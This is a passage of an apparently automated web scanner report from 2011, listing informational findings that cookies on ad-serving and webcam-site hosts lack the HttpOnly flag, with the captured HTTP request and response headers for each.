User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:22:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.309. http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11624211567@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11624211567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264969

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.310. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.311. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2453
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.312. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.313. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.314. http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11911576582@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11911576582@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296268201

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.315. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

11.316. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:03:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.317. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.318. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1874556783@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2453
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.319. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 666
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

var oas_d=new Dat
...[SNIP]...

11.320. http://es.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=8e4ca1d5-377c-48cd-a6db-d82638510b03&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.321. http://es.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=becd25c8-0c61-48da-969d-8a73ed263b7e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:10 GMT; path=/
ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pes=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:17:10 GMT; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5ejgunn2haxg0q55r1tc4d45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=5ejgunn2haxg0q55r1tc4d45; path=/; HttpOnly
Set-Cookie: spvdr=vd=becd25c8-0c61-48da-969d-8a73ed263b7e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:10 GMT; path=/
